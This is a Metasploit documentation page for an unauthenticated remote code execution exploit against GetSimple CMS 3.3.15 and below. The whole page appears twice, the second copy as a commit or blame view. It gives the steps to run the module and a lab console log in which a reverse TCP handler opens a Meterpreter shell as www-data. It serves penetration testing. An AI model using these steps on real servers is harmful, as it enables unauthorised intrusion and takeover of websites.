documentation/modules/exploit/multi/http/getsimplecms_unauth_code_exec.md

## Description

  This module exploits a vulnerability found in GetSimpleCMS, which
  allows unauthenticated attackers to perform Remote Code Execution.
  An arbitrary file upload vulnerability can be triggered by an
  authenticated user, however authentication can be bypassed by leaking
  the cms API key to target the session manager.

## Vulnerable Application

  GetSimple CMS versions 3.3.15 and below

  Vulnerable installations can be found [here](http://get-simple.info/)

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/http/getsimplecms_unauth_code_exec```
  4. Do: ```set RHOSTS <IP>```
  4. Do: ```run```
  5. You should get a shell.

## Scenarios

### Tested on GetSimple CMS v3.3.15 on Ubuntu 18.04

  ```
  msf5 > use exploit/multi/http/getsimplecms_unauth_code_exec
  msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 192.168.37.137
  rhosts => 192.168.37.137
  msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set verbose true
  verbose => true
  msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444
  [*] GetSimpleCMS version 3315
  [*] Sending stage (38247 bytes) to 192.168.37.137
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:32976) at 2019-05-16 11:22:39 -0500

  meterpreter > getuid
  Server username: www-data (33)
  meterpreter > sysinfo
  Computer    : ubuntu
  OS          : Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64
  Meterpreter : php/linux
  meterpreter >
  ```
add documentation 2019-05-16 11:28:43 -05:00			`## Description`

			`This module exploits a vulnerability found in GetSimpleCMS, which`
			`allows unauthenticated attackers to perform Remote Code Execution.`
			`An arbitrary file upload vulnerability can be triggered by an`
			`authenticated user, however authentication can be bypassed by leaking`
			`the cms API key to target the session manager.`

			`## Vulnerable Application`

			`GetSimple CMS versions 3.3.15 and below`

			`Vulnerable installations can be found [here](http://get-simple.info/)`

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: ```use exploit/multi/http/getsimplecms_unauth_code_exec```
			4. Do: ```set RHOSTS <IP>```
			4. Do: ```run```
			`5. You should get a shell.`

			`## Scenarios`

			`### Tested on GetSimple CMS v3.3.15 on Ubuntu 18.04`

			```
			`msf5 > use exploit/multi/http/getsimplecms_unauth_code_exec`
			`msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 192.168.37.137`
			`rhosts => 192.168.37.137`
			`msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > set verbose true`
			`verbose => true`
			`msf5 exploit(multi/http/getsimplecms_unauth_code_exec) > run`

			`[*] Started reverse TCP handler on 192.168.37.1:4444`
			`[*] GetSimpleCMS version 3315`
			`[*] Sending stage (38247 bytes) to 192.168.37.137`
			`[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:32976) at 2019-05-16 11:22:39 -0500`

			`meterpreter > getuid`
			`Server username: www-data (33)`
			`meterpreter > sysinfo`
			`Computer : ubuntu`
			`OS : Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64`
			`Meterpreter : php/linux`
			`meterpreter >`
			```